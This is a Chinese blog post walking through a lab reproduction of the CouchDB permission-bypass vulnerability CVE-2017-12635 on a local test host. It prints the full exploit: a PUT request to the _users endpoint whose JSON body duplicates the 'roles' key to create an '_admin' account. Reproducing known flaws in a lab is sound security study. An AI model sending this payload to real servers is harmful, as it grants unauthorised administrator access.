当前位置: 首页 > article >正文

Couchdb 权限绕过漏洞复现(CVE-2017-12635)

article 2025/1/21 8:56:39

Couchdb 权限绕过漏洞复现(CVE-2017-12635)

image

开启环境给了三个端口号,不知道哪个是正常的,最后试出来52226端口正常。

登录URL:http://192.168.91.129/_utils/#

来到了登录页面

image

用postman发送PUT方法的请求包,这个请求包会导致数据库创建一个用户,在这会把xrzx这个用户创建出来并且加入到admin管理员组里面去

image

然后再回到登录页面,输入刚才创建的账号和密码登录即可

image

http://192.168.91.129/_users/org.couchdb.user:xrzx

{

"type": "user",

"name": "xrzx",

"roles": ["_admin"],

"roles": [],

"password": "admin"

}


http://www.kler.cn/a/146023.html

相关文章:

  • Kivy App开发之UX控件TabbedPanel选项面板
  • MySQL 很重要的库 - 信息字典
  • 【玩转全栈】----Django模板的继承
  • Pytorch使用教程(12)-如何进行并行训练?
  • Golang Gin系列-1:Gin 框架总体概述
  • 基于SpringBoot+Vue的智慧动物园管理系统的设计与实现
  • kafka,RabbitMQ,RocketMQ,他们之间的区别,架构,如何保证消息的不丢失,保证不重复消费,保证消息的有序性
  • 基于PLC的果园灌溉系统设计(论文+源码)
  • R语言数据缩放-1到1
  • 免费分享一套基于springboot的餐饮美食分享平台系统,挺漂亮的
  • 【数据中台】开源项目(2)-Dbus数据总线
  • 只考数据结构,计算机评级C+,成都信息工程大学考情分析
  • 【GD32307E-START】RT-Thread移植测试
  • Debian 11.3 ARM64 安装中文语言包
  • 【开源】基于Vue和SpringBoot的个人健康管理系统
  • 【计算机网络笔记】多路访问控制(MAC)协议——轮转访问MAC协议
  • 056-第三代软件开发-软件打包
  • 正则表达式例题-PTA
  • [Docker]十.Docker Swarm讲解
  • linux磁盘清理
  • jenkins流水线(pipline)实例
  • 夜神模拟器 burp抓包 ADB 微信小程序
  • 数组栈的实现
  • html实现我的故乡,城市介绍网站(附源码)
  • JS之闭包
  • 2024年的云趋势:云计算的前景如何?